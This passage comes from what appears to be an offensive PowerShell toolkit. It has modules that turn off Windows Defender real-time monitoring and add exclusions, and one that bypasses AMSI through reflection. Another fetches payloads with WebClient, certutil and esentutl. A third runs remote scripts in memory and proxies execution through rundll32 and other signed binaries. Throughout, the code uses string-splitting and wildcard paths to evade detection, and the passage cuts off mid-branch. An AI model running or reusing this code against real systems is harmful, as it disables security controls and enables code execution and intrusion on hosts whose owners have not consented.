(Requires Elevation) 18 | 19 | .PARAMETER DisableRtm 20 | Description: Disables Windows Defender Real-Time Monitoring. (Requires Elevation) 21 | 22 | .PARAMETER DisableAMSI 23 | Disables PowerShell's AMSI Hook 24 | 25 | .EXAMPLE 26 | PS> Invoke-DefenderTools -GetExcludes 27 | 28 | .EXAMPLE 29 | PS> Invoke-DefenderTools -AddExclude 30 | 31 | .EXAMPLE 32 | PS> Invoke-DefenderTools -DisableRtm 33 | 34 | .EXAMPLE 35 | PS> Invoke-DefenderTools -DisableAmsi 36 | 37 | .NOTES 38 | Author: Fabrizio Siciliano (@0rbz_) 39 | 40 | #> 41 | [CmdletBinding()] 42 | param ( 43 | [Parameter(Position=1)] 44 | [Switch]$Help, 45 | [Switch]$List, 46 | 47 | [Parameter(Mandatory = $False)] 48 | [Switch]$GetExcludes, 49 | 50 | [Parameter(Mandatory = $False)] 51 | [Switch]$AddExclude, 52 | [string]$Path, 53 | 54 | [Parameter(Mandatory = $False)] 55 | [Switch]$DisableRtm, 56 | 57 | [Parameter(Mandatory = $False)] 58 | [Switch]$DisableAmsi 59 | ) 60 | 61 | if ($Help -eq $True) { 62 | Write @" 63 | 64 | ### Invoke-DefenderTools Help ### 65 | --------------------------------- 66 | Available Invoke-DefenderTools Commands: 67 | ---------------------------------------- 68 | |----------------------------------------------------------------------| 69 | | -GetExcludes | 70 | |----------------------------------------------------------------------| 71 | 72 | [*] Description: Gets any current exclude files/paths/extensions 73 | currently configured in Windows Defender via the Registry. 74 | 75 | [*] Usage: Invoke-DefenderTools -GetExcludes 76 | 77 | [*] Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 78 | [*] Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 79 | 80 | |----------------------------------------------------------------------| 81 | | -AddExclude [-Path] path | 82 | |----------------------------------------------------------------------| 83 | 84 | [*] Description: Adds a path exclude to Windows Defender. 
85 | (Requires Elevation) 86 | 87 | [*] Usage: Invoke-DefenderTools -AddExclude -Path C:\temp 88 | 89 | [*] Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 90 | [*] Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 91 | 92 | |----------------------------------------------------------------------| 93 | | -DisableRTM | 94 | |----------------------------------------------------------------------| 95 | 96 | [*] Description: Disables Windows Defender Real-Time Monitoring. 97 | (Requires Elevation) 98 | 99 | Note: Will pop an alert to the end user. 100 | 101 | [*] Usage: Invoke-DefenderTools -DisableRtm 102 | 103 | [*] Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 104 | [*] Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 105 | 106 | |----------------------------------------------------------------------| 107 | | -DisableAMSI | 108 | |----------------------------------------------------------------------| 109 | 110 | [*] Description: Disables PowerShell's AMSI Hook 111 | 112 | [*] Usage: Invoke-DefenderTools -DisableAmsi 113 | 114 | [*] Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 115 | [*] Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 116 | 117 | \----------------------------------------------------------------------/ 118 | 119 | "@ 120 | } 121 | elseif ($List -eq $True) { 122 | Write @" 123 | 124 | Invoke-DefenderTools Brief Command Usage: 125 | ----------------------------------------- 126 | Invoke-DefenderTools -GetExcludes 127 | Invoke-DefenderTools -AddExclude -Path C:\temp 128 | Invoke-DefenderTools -DisableRtm 129 | Invoke-DefenderTools -DisableAMSI 130 | 131 | "@ 132 | } 133 | 134 | elseif ($GetExcludes) { 135 | 136 | $h = "`n### Invoke-DefenderTools(GetExcludes) ###`n" 137 | $h 138 | Write "`nPATHS/FILE EXCLUSIONS" 139 | Write "---------------------" 140 | $RegKey = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths') 141 | $RegKey.PSObject.Properties | ForEach-Object { 142 | If($_.Name 
-like '*:\*'){ 143 | Write $_.Name 144 | } 145 | } 146 | Write "`nPROCESS EXCLUSIONS" 147 | Write "------------------" 148 | $RegKey = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes') 149 | $RegKey.PSObject.Properties | ForEach-Object { 150 | If($_.Name -like '*.*'){ 151 | Write $_.Name 152 | } 153 | } 154 | Write "`nEXTENSION EXCLUSIONS" 155 | Write "--------------------" 156 | $RegKey = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions') 157 | $RegKey.PSObject.Properties | ForEach-Object { 158 | If($_.Name -like '*.*'){ 159 | Write $_.Name 160 | } 161 | } 162 | $h 163 | } 164 | elseif ($AddExclude -and $Path) { 165 | if ($PSVersionTable.PSVersion.Major -eq "2") { 166 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 167 | return 168 | } 169 | 170 | $h = "`n### Invoke-DefenderTools(AddExclude) ###`n" 171 | 172 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups ` 173 | -match "S-1-5-32-544"))) { 174 | $h 175 | Add-MpPreference -ExclusionPath "$path" 176 | Write " [+] Added a Defender exclude path of '$path'!" 177 | $h 178 | } 179 | else { 180 | $h 181 | Write " [!] Not Admin. Must be admin or running as a high-integrity process to add a Defender exclude." 182 | $h 183 | } 184 | } 185 | elseif ($DisableRtm) { 186 | if ($PSVersionTable.PSVersion.Major -eq "2") { 187 | Write "`n [!] This function requires PowerShell version greater than 2.0.`n" 188 | return 189 | } 190 | 191 | $h = "`n### Invoke-DefenderTools(DisableRtm) ###`n" 192 | 193 | if ($([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544"))) { 194 | $h 195 | Set-MpPreference -DisableRealTimeMonitoring $true 196 | Write " [+] Successfully disabled Defender's real-time monitoring." 197 | $h 198 | } 199 | else { 200 | $h 201 | Write " [!] Not Admin. 
Must be admin or running as a high-integrity process to disable Defender's Real-Time Monitoring."
            $h
        }
    }
    elseif ($DisableAmsi) {
        # Tail of Invoke-DefenderTools: the function header and the other switches are above this view.
        if ($PSVersionTable.PSVersion.Major -eq "2") {
            Write "`n [!] This function requires PowerShell version greater than 2.0.`n"
            return
        }

        # https://github.com/jakehomb/AMSI-Exec/blob/master/Invoke-AmsiExec.ps1
        # https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
        $h = "`n### Invoke-DefenderTools(DisableAmsi) ###`n"

        # Reads the private AmsiUtils.amsiInitFailed flag by reflection (type/field names are split
        # with '+' to avoid a literal match). $true means AMSI already reports itself as failed here.
        if ($([bool](([Ref].Assembly.GetType('System.Management.Automation.A'+'msiUtils').GetField('a'+'msiInitFailed','NonPublic,Static').GetValue($null))))) {
            $h
            Write " [+] Amsi is already disabled."
            $h
        }
        else {

            Try {

                # Unmanaged buffer handed to AMSI as a bogus context; it is never released (no FreeHGlobal).
                $a = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076)

                [Ref].Assembly.GetType('System.Management.Automation.A'+'msiUtils').GetField('a'+'msiSession','NonPublic,Static').SetValue($null,$null)

                [Ref].Assembly.GetType('System.Management.Automation.A'+'msiUtils').GetField('a'+'msiContext','NonPublic,Static').SetValue($null, [IntPtr]$a)

                $h
                Write " [+] Disabled Amsi."
                $h
            }
            Catch {
                # The exception is swallowed; the reason (e.g. field missing on this PowerShell build) is lost.
                $h
                Write " [-] An Error has occurred. Unable to disable Amsi."
                $h
            }
        }
    }
}
--------------------------------------------------------------------------------
/modules/Invoke-Download.ps1:
--------------------------------------------------------------------------------
function Invoke-Download {
<#

.SYNOPSIS
Commands for downloading files to the target system.

.DESCRIPTION
Three download paths, selected by switch:

  -PsDownload  System.Net.WebClient.DownloadFile with a fixed (Firefox 3.5) User-Agent.
  -CertUtil    Shells out to certutil.exe (-f -split -VerifyCTL <url>) and collects the
               resulting *.bin from the CURRENT directory before moving it to -LocalFile.
  -Esentutl    Shells out to esentutl.exe (/y <unc> /d <local> /o) to copy from a UNC path.

In every branch success is inferred from Test-Path on -LocalFile after the fact, not from
the downloader's own result, so a pre-existing file at -LocalFile also reports success.
The two external binaries are invoked through wildcard paths (C:\??*?\*3?\...) that
PowerShell resolves under System32 at run time; the child process is still certutil.exe /
esentutl.exe as far as the OS and any process-creation telemetry are concerned.

.PARAMETER Help
Shows detailed help for each function.

.PARAMETER List
Shows summary list of available functions.

.PARAMETER PsDownload
Downloads a file to the target system using a traditional powershell 'DownloadFile' cradle.

.PARAMETER CertUtil
Uses certutil.exe to download a file to the target system. Uses the "VerifyCTL" method.

.PARAMETER Esentutl
Uses esentutl.exe to download a file from a remote UNC Path.

.EXAMPLE
PS> Invoke-Download -PsDownload -RemoteFile https://192.168.1.1/file.exe -LocalFile C:\temp\file.exe

.EXAMPLE
PS> Invoke-Download -CertUtil -RemoteFile http://192.168.1.1/file.exe -LocalFile C:\temp\file.exe

.EXAMPLE
PS> Invoke-Download -Esentutl -RemoteUNCPath \\192.168.1.1\share\file.exe -LocalFile C:\temp\file.exe

.NOTES
Author: Fabrizio Siciliano (@0rbz_)

#>
    [CmdletBinding()]
    param (
        [Parameter(Position=1)]
        [Switch]$Help,
        [Switch]$List,

        [Parameter(Mandatory = $False)]
        [Switch]$PsDownload,
        [String]$RemoteFile,
        [String]$LocalFile,

        # $LocalFile2 / $RemoteFile2 / $LocalFile3 alias the primary parameters for the
        # per-switch help layout; the body below only ever reads $RemoteFile, $LocalFile
        # and $RemoteUNCPath.
        [Parameter(Mandatory = $False)]
        [Switch]$CertUtil,
        [String]$LocalFile2=[String]$LocalFile,
        [String]$RemoteFile2=[string]$RemoteFile,

        [Parameter(Mandatory = $False)]
        [Switch]$EsentUtl,
        [String]$RemoteUNCPath,
        [String]$LocalFile3=[String]$LocalFile
    )

    if ($Help -eq $True) {

        Write @"

### Invoke-Download Help ###
----------------------------
Available Invoke-Download Commands:
-----------------------------------
|-----------------------------------------------------------------------------|
| -PsDownload [-RemoteFile] remote_File [-LocalFile] local_file |
|-----------------------------------------------------------------------------|

[*] Description: Downloads a file to the target system using a traditional
powershell 'DownloadFile' cradle.

[*] Usage: Invoke-Download -PsDownload -RemoteFile https://server/File.exe
-LocalFile C:\temp\File.exe

[*] Mitre ATT&CK Ref: T1105 (Remote File Copy)

|-----------------------------------------------------------------------------|
| -CertUtil [-RemoteFile] remote_File [-LocalFile] localfile |
|-----------------------------------------------------------------------------|

[*] Description: Uses certutil.exe to download a file to the target system.
Uses the "VerifyCTL" method.

[*] Usage: Invoke-Download -CertUtil -RemoteFile http://server/File.exe -LocalFile C:\temp\file.exe

[*] Mitre ATT&CK Ref: T1105 (Remote File Copy)

|-----------------------------------------------------------------------------|
| -Esentutl [-RemoteUNCPath] remote_File [-LocalFile] local_file |
|-----------------------------------------------------------------------------|

[*] Description: Uses Esentutil.exe to download a file from a remote UNC Path.

[*] Usage: Invoke-Download -Esentutl -RemoteUNCPath \\192.168.1.1\share\file.exe -LocalFile C:\temp\file.exe

[*] Mitre ATT&CK Ref: T1105 (Remote File Copy)

\-----------------------------------------------------------------------------/

"@
    }

    elseif ($List -eq $True) {
        Write @"

Invoke-Download Brief Command Usage:
------------------------------------
Invoke-Download -PsDownload -RemoteFile https://192.168.1.1/file.exe -LocalFile C:\temp\file.exe
Invoke-Download -CertUtil -RemoteFile https://192.168.1.1/file.exe -LocalFile C:\temp\file.exe
Invoke-Download -Esentutl -RemoteUNCPath \\192.168.1.1\share\file.exe -LocalFile C:\temp\file.exe

"@
    }

    elseif ($PsDownload -and $RemoteFile -and $LocalFile) {
        if ($PSVersionTable.PSVersion.Major -eq "2") {
            Write "`n [!] This function requires PowerShell version greater than 2.0.`n"
            return
        }
        $h = "`n### Invoke-Download(PsDownload) ###`n"

        # Synchronous WebClient download with a fixed, dated User-Agent. Unlike the -Esentutl
        # branch there is no Try/Catch: a failed DownloadFile (DNS, 404, TLS error) surfaces the
        # .NET exception to the caller and execution then falls through to the Test-Path below.
        # No integrity check is performed on what was fetched.
        $dl = New-Object System.Net.WebClient
        $dl.headers.add("User-Agent", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5")
        $dl.downloadfile("$RemoteFile", "$LocalFile")

        # Success = "a file now exists at $LocalFile"; it says nothing about which file.
        if ($(Test-Path -path $LocalFile)) {
            $h
            Write " [+] File successfully downloaded to $LocalFile"
            $h
        }
        else {
            $h
            Write " [-] Download failed. Make sure your File exists at $RemoteFile and that $LocalFile is writable and try again."
            $h
        }
    }
    elseif ($Certutil -and $RemoteFile -and $LocalFile) {
        # https://twitter.com/egre55/status/1087685529016193025
        # No PowerShell 2.0 guard in this branch, unlike the other two.

        # Everything after the last '/' in the URL becomes the interim file name (a query string
        # would be included as-is).
        $RemoteFileName = $RemoteFile.Substring($RemoteFile.LastIndexOf("/") + 1)
        # Wildcard path -> System32\certutil.exe. "-f -split -VerifyCTL <url>" fetches the URL and
        # writes the blob(s) as *.bin into the current working directory; certutil's own output is
        # discarded, so a failed fetch is only noticed by the Test-Path below.
        (C:\??*?\*3?\?er*ut?l.?x? -f -split -VerifyCTL $RemoteFile) | Out-null

        # Picks up ANY *.bin in the current directory, including ones that were already there.
        # NOTE(review): with more than one match .FullName is an array and Rename-Item will most
        # likely fail to bind it — consider filtering by LastWriteTime or newest match.
        $LocalFile1 = (Get-Item *.bin).FullName

        # Both operations are relative to the current directory.
        Rename-Item $LocalFile1 $RemoteFileName
        Move-Item $RemoteFileName $LocalFile -Force

        if ($(Test-Path -path $LocalFile)) {

            Write-Output "`n [+] File downloaded to $LocalFile`n"
        }
        else {
            Write-Output "`n [!] Download Failed.`n"
        }
    }
    elseif ($EsentUtl -and $RemoteUNCPath -and $LocalFile) {
        # https://twitter.com/egre55/status/985994639202283520

        # Existence is checked on the literal path; the invocation below uses a wildcard path that
        # resolves to the same binary.
        if ($(Test-Path -path "C:\windows\system32\esentutl.exe")) {
            Try {

                # esentutl /y <source> /d <destination> /o : raw file copy, here from a UNC source.
                # A non-zero exit from the native binary does not throw, so Catch only covers
                # PowerShell-level errors (e.g. a bad -LocalFile path).
                (C:\??*?\*3?\Es*n?U??.?x? /y $RemoteUNCPath /d $LocalFile /o)

                if ($(Test-Path -path $LocalFile)) {
                    Write "`n [+] File successfully downloaded to $LocalFile`n"
                }
            }
            Catch {
                Write "`n [!] Unknown Error.`n"
            }
        }
        # Re-tests the same path instead of an else branch; the message text says "esentutil".
        if (!$(Test-Path -path "C:\windows\system32\esentutl.exe")) {
            Write "`n [!] Can't find esentutil.exe in its usual location. Unable to download file.`n"
        }
    }
}
--------------------------------------------------------------------------------
/modules/Invoke-Execute.ps1:
--------------------------------------------------------------------------------
function Invoke-Execute {
<#

.SYNOPSIS
Execute commands on a target system using a number of different "living-off-the-land" techniques.

.PARAMETER Help
Shows detailed help for each function.

.PARAMETER List
Shows summary list of available functions.

.PARAMETER DownloadString
Executes a remote powershell script in memory using Net.WebClient DownloadString Method.

.PARAMETER XmlHTTP
Executes a remote powershell script in memory using Msxml2.XMLHTTP COM Object.

.PARAMETER Rundll
Executes a local DLL/EXE (or command) using rundll32 with a number of different methods.

.PARAMETER WmicExec
Executes a local command via "wmic process call create".

.PARAMETER WmicXSL
Utilizes wmic process get brief to execute a built-in XSL file containing a JScript ActiveXObject command.

.PARAMETER OdbcExec
Uses odbcconf.exe to execute a local DLL or DLL at a UNC path.

.PARAMETER WinRmWmi
Executes a command from a built-in XML file via winrm.vbs.

.PARAMETER SignedProxyDll
Executes a DLL via an existing signed binary.

Available SignedProxyDll Methods:

[1] AdobeARM.exe

.PARAMETER SignedProxyExe
Executes an EXE via an existing signed binary.

Available SignedProxyExe Methods:

[1] pcalua.exe
[2] SynTPEnh.exe

.EXAMPLE
Invoke-Execute -RunDll -Method 1 -File C:\temp\File.dll
Invoke-Execute -RunDll -Method 5 -File 'cmd.exe /c net user....'

Available RunDLL Methods:

[1] shell32.dll,Control_RunDLL (DLL or CPL)
[2] shell32.dll,Control_RunDLLA (DLL or CPL)
[3] IEAdvpack.dll,RegisterOCX (DLL or EXE or COMMAND)
[4] zipfldr.dll,RouteTheCall (EXE)
[5] advpack.dll,RegisterOCX (DLL or EXE or COMMAND)
[6] pcwutl.dll,LaunchApplication (EXE)

.EXAMPLE
Invoke-Execute -OdbcExec -Dll \\server\share\File.dll

.EXAMPLE
Invoke-Execute -WinRmWmi -Command "cmd.exe /c net user...."

.EXAMPLE
Invoke-Execute -SignedProxyExe -Method 1 -Exe C:\temp\file.exe

.EXAMPLE
Invoke-Execute -XmlHTTP -PsUrl http://192.168.1.1/script.ps1

.NOTES
Author: Fabrizio Siciliano (@0rbz_)

Review notes (grounded in this listing):
- Every branch interpolates $Command / $File / $Dll / $Exe / $PsUrl into a native command
  line or Invoke-Expression without quoting or validation.
- System32 binaries are reached through wildcard paths (C:\??*?\*3?\...) and through
  "C:\<random>\..\..\..\windows\system32\..." spellings; both resolve to the real binary
  before the process starts, so the launched image is unchanged.
- The XSL and XML here-strings in -WmicXSL and -WinRmWmi are empty in this rendering of the
  file (their markup was lost); see the comments at those branches.

#>

    [CmdletBinding()]
    param (
        [Parameter(Position=1)]
        [Switch]$Help,
        [Switch]$List,

        [Parameter(Mandatory = $False)]
        [Switch]$DownloadString,
        [String]$PsUrl,

        # The *2 / *3 parameters alias the primary ones for the per-switch help layout; the body
        # below reads only $PsUrl, $Method, $File, $Command, $Dll and $Exe.
        [Parameter(Mandatory = $False)]
        [Switch]$XmlHTTP,
        [String]$PsUrl2=[String]$PsUrl,

        [Parameter(Mandatory = $False)]
        [Switch]$Rundll,
        [String]$Method,
        [string]$File,

        [Parameter(Mandatory = $False)]
        [Switch]$WmicExec,
        [string]$Command,

        [Parameter(Mandatory = $False)]
        [Switch]$WmicXSL,
        [string]$command2=[string]$command,

        [Parameter(Mandatory = $False)]
        [Switch]$OdbcExec,
        [string]$Dll,

        [Parameter(Mandatory = $False)]
        [Switch]$WinRmWmi,
        [string]$Command3=[string]$Command,

        [Parameter(Mandatory = $False)]
        [Switch]$SignedProxyDll,
        [String]$Method2=[String]$Method,
        [String]$Dll2=[string]$Dll,

        [Parameter(Mandatory = $False)]
        [Switch]$SignedProxyExe,
        [String]$Method3=[String]$Method,
        [String]$Exe

    )
    # Candidate staging directories for the temporary payload files written by -WmicXSL and
    # -WinRmWmi ($XslFile / $XmlFile below). Test-Path further down only proves a directory
    # exists, not that the current user can write to it — several of these (e.g.
    # C:\windows\system32\config) are normally not writable by a standard user, so
    # Set-Content may still fail there — TODO confirm per target.
    # "C:\ProgramData\Microsoft\Crypto\SystemKeys" appears twice.
    $DataDirs = @(
        ("C:\ProgramData\Intel"),
        ("C:\ProgramData\Microsoft\Crypto\SystemKeys"),
        ("C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys"),
        ("C:\ProgramData\Microsoft\Crypto\SystemKeys"),
        ("C:\ProgramData\Microsoft\Diagnosis"),
        ("C:\ProgramData\Microsoft\Diagnosis\FeedbackHub"),
        ("C:\ProgramData\Microsoft\Diagnosis\Scripts"),
        ("C:\ProgramData\Microsoft\Network\Downloader"),
        ("C:\ProgramData\Microsoft\Search\Data"),
        ("C:\ProgramData\Microsoft\Search\Data\Applications"),
        ("C:\ProgramData\Microsoft\Search\Data\Temp"),
        ("C:\ProgramData\Microsoft\Windows\WER\ReportArchive"),
        ("C:\ProgramData\Microsoft\Windows\WER\ReportQueue"),
        ("C:\ProgramData\Microsoft\Windows\WER\Temp"),
        ("C:\ProgramData\WindowsHolographicDevices"),
        ("C:\Users\Public\Libraries"),
        ("C:\Users\Public\AccountPictures"),
        ("C:\Users\Public\Documents"),
        ("C:\Users\Public\Downloads"),
        ("C:\Users\Public\Music"),
        ("C:\Users\Public\Pictures"),
        ("C:\Users\Public\Videos"),
        ("C:\Users\Public\Roaming"),
        ("C:\Windows\debug\WIA"),
        ("C:\Windows\ServiceProfiles\LocalService"),
        ("C:\Windows\ServiceProfiles\LocalService\AppData"),
        ("C:\Windows\ServiceProfiles\LocalService\AppData\Local"),
        ("C:\Windows\ServiceProfiles\LocalService\AppData\LocalLow"),
        ("C:\Windows\Temp"),
        ("C:\windows\system32\config"),
        ("C:\Windows\System32\LogFiles\WMI"),
        ("C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys")
    )

    # Keep the directories that exist on this host, then pick one at random.
    # NOTE(review): if exactly one survives, $NewArray is a plain string (the foreach statement
    # does not keep the inner @() wrapper) and "$newarray[0]" yields its first character, 'C'.
    # Wrapping the foreach in @( ... ) would make this robust.
    $NewArray = foreach ($datadir in $datadirs) {
        if (Test-Path $datadir) {
            @($datadir)
        }
    }
    $datadir = ($newarray[(get-random -Maximum ([array]$newarray).count)])

    # Random alphabetic strings. $rs1/$rs2 are inserted as bogus path components in the
    # "C:\$rs2\..\..\..\windows\system32\..." spellings below (which normalise back to the real
    # System32 path); $rs3 and $rs1 also name the temporary .xsl / xml payload files.
    $Rs1 = (-join ((65..90) + (97..122) | Get-Random -Count 13 | foreach {[char]$_}))
    $Rs2 = (-join ((65..90) + (97..122) | Get-Random -Count 11 | foreach {[char]$_}))
    $Rs3 = (-join ((65..90) + (97..122) | Get-Random -Count 9 | foreach {[char]$_}))

    if ($Help) {

        Write @"

### Invoke-Execute Help ###
---------------------------
Available Invoke-Execute Commands:
----------------------------------
|----------------------------------------------------------------------------|
| -DownloadString [-PsUrl] url |
|----------------------------------------------------------------------------|

[*] Description: Executes a remote powershell script in memory
using Net.WebClient DownloadString Method.

[*] Usage: Invoke-Execute -DownloadString -PsUrl http://server/script.ps1

[*] Mitre ATT&CK Ref: T1086 (PowerShell)

|----------------------------------------------------------------------------|
| -XmlHTTP [-PsUrl] url |
|----------------------------------------------------------------------------|

[*] Description: Executes a remote powershell script in memory using
Msxml2.XMLHTTP COM Object.

[*] Usage: Invoke-Execute -XmlHTTP -PsUrl http://server/script.ps1

[*] Mitre ATT&CK Ref: T1086 (PowerShell)

|----------------------------------------------------------------------------|
| -RunDLL [-Method] num [-File] path_to_dll |
|----------------------------------------------------------------------------|

[*] Description: Executes a local DLL/EXE (or command) using
rundll32 with a number of different methods.

[*] Usage: Invoke-Execute -RunDll -Method 1 -File C:\temp\File.dll
[*] Usage: Invoke-Execute -RunDll -Method 5 -File 'cmd.exe /c net user....'

Available RunDLL Methods:

[1] shell32.dll,Control_RunDLL (DLL or CPL)
[2] shell32.dll,Control_RunDLLA (DLL or CPL)
[3] IEAdvpack.dll,RegisterOCX (DLL or EXE or COMMAND)
[4] zipfldr.dll,RouteTheCall (EXE)
[5] advpack.dll,RegisterOCX (DLL or EXE or COMMAND)
[6] pcwutl.dll,LaunchApplication (EXE)

[*] Mitre ATT&CK Ref: T1085 (Rundll32)

|----------------------------------------------------------------------------|
| -WmicExec [-Command] "cmd.exe /c net user..." |
|----------------------------------------------------------------------------|

[*] Description: Executes a local command via wmic process call
create.

[*] Usage: Invoke-Execute -WmicExec -Command "cmd.exe /c net user..."

[*] Mitre ATT&CK Ref: T1047 (Windows Management Instrumentation)

|----------------------------------------------------------------------------|
| -WmicXsl [-Command] "cmd.exe /c net user..." |
|----------------------------------------------------------------------------|

[*] Description: Utilizes wmic process get brief to execute a built-in XSL
file containing a JScript ActiveXObject command.

[*] Usage: Invoke-Execute -WmicXsl -Command "cmd.exe /c net user..."

[*] Mitre ATT&CK Ref: T1220 (XSL Script Processing)

|----------------------------------------------------------------------------|
| -OdbcExec [-Dll] path_to_dll |
|----------------------------------------------------------------------------|

[*] Description: Uses odbcconf.exe to execute a local DLL or DLL
at a UNC path.

[*] Usage: Invoke-Execute -OdbcExec -Dll \\server\share\File.dll
[*] Usage: Invoke-Execute -OdbcExec -Dll C:\temp\File.dll

[*] Mitre ATT&CK Ref: T1085 (Rundll32)

|----------------------------------------------------------------------------|
| -WinRmWmi [-Command] "cmd /c net user ..." |
|----------------------------------------------------------------------------|

[*] Description: Executes a command from a built-in XML file via winrm.vbs.

[*] Usage: Invoke-Execute -WinRmWmi -Command cmd.exe
[*] Usage: Invoke-Execute -WinRmWmi -Command "cmd.exe /c net user...."

[*] Mitre ATT&CK Ref: T1028 (Windows Remote Management)

|----------------------------------------------------------------------------|
| -SignedProxyDll [-Method] num [-Dll] file.dll |
|----------------------------------------------------------------------------|

[*] Description: Executes a DLL via an existing signed binary.

[*] Usage: Invoke-Execute -SignedProxyDll -Method 1 -Dll C:\temp\file.dll

Available SignedProxyDll Methods

[1] AdobeARM.exe

[*] Mitre ATT&CK Ref: T1218 (Signed Binary Proxy Execution)

|----------------------------------------------------------------------------|
| -SignedProxyExe [-Method] num [-Exe] file.exe |
|----------------------------------------------------------------------------|

[*] Description: Executes an EXE via an existing signed binary.

[*] Usage: Invoke-Execute -SignedProxyExe -Method 1 -Exe C:\temp\file.exe

Available SignedProxyExe Methods:

[1] pcalua.exe
[2] SynTPEnh.exe

[*] Mitre ATT&CK Ref: T1218 (Signed Binary Proxy Execution)

\-----------------------------------------------------------------------------/

"@
    }

    elseif ($List -eq $True) {
        Write @"

Invoke-Execute Brief Command Usage:
-----------------------------------
Invoke-Execute -DownloadString -PsUrl http://server/script.ps1
Invoke-Execute -XmlHTTP -PsUrl http://server/script.ps1
Invoke-Execute -RunDll -Method 1,2,3,4,5,6 -File 'cmd.exe /c net user....'
Invoke-Execute -WmicExec -Command "cmd.exe /c net user..."
Invoke-Execute -WmicXsl -Command "cmd.exe /c net user..."
Invoke-Execute -OdbcExec -Dll \\server\share\File.dll
Invoke-Execute -WinRmWmi -Command "cmd.exe /c net user...."
Invoke-Execute -SignedProxyDll -Method 1 -Dll C:\temp\file.dll
Invoke-Execute -SignedProxyExe -Method 1,2 -Exe C:\temp\file.exe

"@
    }

    elseif ($DownloadString -and $PsUrl) {
        if ($PSVersionTable.PSVersion.Major -eq "2") {
            Write "`n [!] This function requires PowerShell version greater than 2.0.`n"
            return
        }
        $h = "`n### Invoke-Execute(DownloadString) ###`n"
        Try {

            # Fetches the script body with a fixed User-Agent and runs it verbatim through
            # Invoke-Expression. Nothing about the content is validated (no hash, signature or
            # certificate pinning) and the usage examples are plain http://, so anyone able to
            # answer for $PsUrl gets code execution in this process.
            $dl = New-Object System.Net.WebClient
            $dl.headers.add("User-Agent", "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5")
            Invoke-Expression $dl.DownloadString($PsUrl)
            $h
            Write " [+] Executed the following powershell script in memory: $PsUrl"
            $h
        }
        Catch {
            # Any failure (network or an exception thrown by the fetched script itself) ends here.
            $h
            Write "`n [!] Unknown Error.`n"
            $h
        }
    }
    elseif ($XmlHTTP -and $PsUrl) {
        # https://gist.github.com/HarmJ0y/bb48307ffa663256e239
        # Same cradle via the Msxml2.XMLHTTP COM object (synchronous GET, $false = not async).
        # No PowerShell 2.0 guard here, and the same lack of content validation as above.
        $h = "`n### Invoke-Execute(XmlHTTP) ###`n"
        Try {
            $Dl = (New-Object -ComObject Msxml2.XMLHTTP)
            $Dl.open('GET',"$PsUrl",$false)
            $Dl.send()
            Invoke-Expression $Dl.responseText
            $h
            Write " [+] Executed the following powershell script in memory: $PsUrl"
            $h
        }
        Catch {
            $h
            Write "`n [!] Unknown Error.`n"
            $h
        }
    }
    # -RunDll: all six methods spawn the same binary (the wildcard resolves to System32\rundll32.exe)
    # and differ only in the exported entry point that receives $File. $Method is declared
    # [String], so "-eq 1" compares against the string "1". The DLL path is spelled with one or
    # two random, non-existent segments followed by enough "..\" to land back in System32.
    # rundll32's exit status is not checked; the "Executed:" line prints unconditionally.
    elseif ($RunDll -and $Method -eq 1 -and $File) {
        # https://www.thewindowsclub.com/rundll32-shortcut-commands-windows
        # https://twitter.com/mattifestation/status/776574940128485376
        $h = "`n### Invoke-Execute(rundll) ###`n"
        (C:\??*?\*3?\?un?l*3?.?x? C:\$rs2\..\$rs1\..\..\..\windows\system32\shell32.dll,Control_RunDLL $File)
        $h
        Write " [+] Executed: rundll32.exe shell32.dll,Control_RunDLL $File"
        $h
    }
    elseif ($Rundll -and $Method -eq 2 -and $File) {
        # https://www.thewindowsclub.com/rundll32-shortcut-commands-windows
        # https://twitter.com/Hexacorn/status/885258886428725250
        $h = "`n### Invoke-Execute(rundll) ###`n"
        (C:\??*?\*3?\?un?l*3?.?x? C:\$rs2\..\..\..\windows\system32\shell32.dll,Control_RunDLLA $File)
        $h
        Write " [+] Executed: rundll32.exe shell32.dll,Control_RunDLLA $File"
        $h
    }
    elseif ($Rundll -and $Method -eq 3 -and $File) {
        # https://twitter.com/0rbz_/status/974472392012689408
        $h = "`n### Invoke-Execute(rundll) ###`n"
        (C:\??*?\*3?\?un?l*3?.?x? C:\$rs2\..\..\..\windows\system32\IEAdvpack.dll,RegisterOCX $File)
        $h
        Write " [+] Executed: rundll32.exe IEAdvpack.dll,RegisterOCX $File"
        $h
    }
    elseif ($Rundll -and $Method -eq 4 -and $File) {
        # https://twitter.com/Moriarty_Meng/status/977848311603380224
        $h = "`n### Invoke-Execute(rundll) ###`n"
        (C:\??*?\*3?\?un?l*3?.?x? C:\$rs2\..\..\..\windows\system32\zipfldr.dll,RouteTheCall $File)
        $h
        Write " [+] Executed: rundll32.exe zipfldr.dll,RouteTheCall $File"
        $h
    }
    elseif ($Rundll -and $Method -eq 5 -and $File) {
        # https://twitter.com/bohops/status/977891963763675141
        $h = "`n### Invoke-Execute(rundll) ###`n"
        (C:\??*?\*3?\?un?l*3?.?x? C:\$rs2\..\..\..\windows\system32\advpack.dll,RegisterOCX $File)
        $h
        Write " [+] Executed: rundll32.exe advpack.dll,RegisterOCX $File"
        $h
    }
    elseif ($Rundll -and $Method -eq 6 -and $File) {
